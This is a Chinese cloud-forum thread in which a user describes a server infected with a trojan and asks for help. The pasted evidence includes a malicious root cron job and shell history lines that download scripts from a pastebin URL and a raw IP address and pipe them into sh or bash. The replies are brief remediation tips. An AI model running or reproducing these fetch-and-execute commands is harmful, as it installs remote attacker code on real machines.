机器中了木马

感觉机器应该是中了木马，有一下几个现象：

1. 异常定时任务

root@iZ2ze82p1dogvdrx4fu0i7Z:~# cat /var/spool/cron/crontabs/root
*/31 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh
##

2. 某些指令被劫持，比如top指令不正常显示系统使用指标，而是显示

root@iZ2ze82p1dogvdrx4fu0i7Z:~# top
  PID TTY          TIME CMD
31637 pts/3    00:00:00 bash
32078 pts/3    00:00:00 top

3. 通过history指令查看到一些异常的历史操作

1878  2018-09-10 15:18:59 root wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh
1879  2018-09-02 15:03:03 root ufw status
1880  2018-09-02 15:04:49 root curl -s http://192.99.142.248:8220/

请协助分析并解决问题。

展开

收起

1493220386911762 2018-09-10 15:24:19 849 版权

4 条回答

写回答

取消提交回答

阿里云内容团队
本回答引用自以下KB文档：ECS实例感染木马病毒后的解决方法

更多帮助请访问以下站点：
- 阿里云文档中心：https://help.aliyun.com/
- 智能在线：https://ia.aliyun.com/home
- 自助工具：https://help.aliyun.com/learn/tool.html
2020-12-22 11:26:53 举报

赞同 1 评论

评论
全部评论 (0)
登录后可评论
qq78315851

郑州云淘科技有限公司 www.yuntaokeji.com QQ号码78315851

中毒问题排查确实比较麻烦。如果可以尝试备份数据后重做系统。

2018-09-10 15:46:02 举报

赞同评论

评论
全部评论 (0)
登录后可评论
jiaokele

建议您进行系统安全加固下或者开启云盾服务，并开启所有云盾安全防护功能对您的主机进行安全防护，免于再次遭到恶意攻击。
实施安全防御方案

请您尽快开启云盾服务，开启步骤详见：http://help.aliyun.com/view/11108300_13730770.html

同时也建议您开启云盾应用防火墙功能，开启步骤详见：

http://help.aliyun.com/view/11108300_13857395.html

2018-09-10 15:25:12 举报

赞同评论

评论
全部评论 (0)
登录后可评论
orzxiz

建议使用安骑士对服务器进行扫描

望采纳,谢谢!

2018-09-10 15:24:57 举报

赞同评论

评论
全部评论 (0)
登录后可评论

探索云世界

热门

云计算

大数据

云原生

人工智能

数据库

开发与运维

活动广场

任务中心

训练营

直播

乘风者计划

下载

镜像站

技术资料

机器中了木马

相关文章